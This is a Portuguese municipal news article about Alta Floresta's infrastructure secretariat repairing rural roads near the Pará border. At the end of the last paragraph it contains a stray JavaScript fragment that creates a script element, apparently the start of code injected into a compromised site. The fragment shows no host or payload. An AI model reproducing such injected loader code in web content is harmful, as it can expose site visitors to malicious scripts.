Capa / Em Destaque / Vicinais na divisa com o Pará estão sendo recuperadas

Vicinais na divisa com o Pará estão sendo recuperadas

ESSAA Prefeitura de Alta Floresta intensificou nos últimos trinta dias a recuperação das estradas vicinais que ficam localizadas do outro lado do Rio Teles Pires, na região de divisa com o Estado do Pará. Para realizar este serviço a Secretaria Municipal de Infraestrutura (SINFRA) enviou cerca de 10 funcionários, motoniveladora, trator esteira, caminhão pipa e veículos de apoio.

Neste primeiro momento as estradas estão recebendo o patrolamento para posteriormente serem cascalhadas. Com o trator esteira a SINFRA já reabriu aproximadamente 40 quilômetros, inclusive fez um desvio em um dos piores trechos, que fica localizado na serrinha. Durante muito tempo o setor produtivo sofreu com estradas sem condições de trafegabilidade naquela região.

De acordo com o secretário de Infraestrutura, Eloi Luiz de Almeida, o objetivo é recuperar todas as estradas vicinais na divisa com o Pará assegurando melhores condições de trafegabilidade para o transporte da produção agropecuária. Diariamente saem dezenas de carretas e caminhões carregados principalmente de grãos e madeira. A região está em franco desenvolvimento e representa uma parcela significativa do crescimento do plantio de soja no município de Alta Floresta.

EM CONCLUSÃO – A Secretaria Municipal de Infraestrutura já concluiu o patrolamento de todas as estradas vicinais do Setor Oeste, restando apenas terminar o cascalhamento de alguns trechos. Este serviço não foi realizado porque a pá carregadeira apresentou problemas mecânicos e teve que ser recolhida para receber os reparos necessários.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top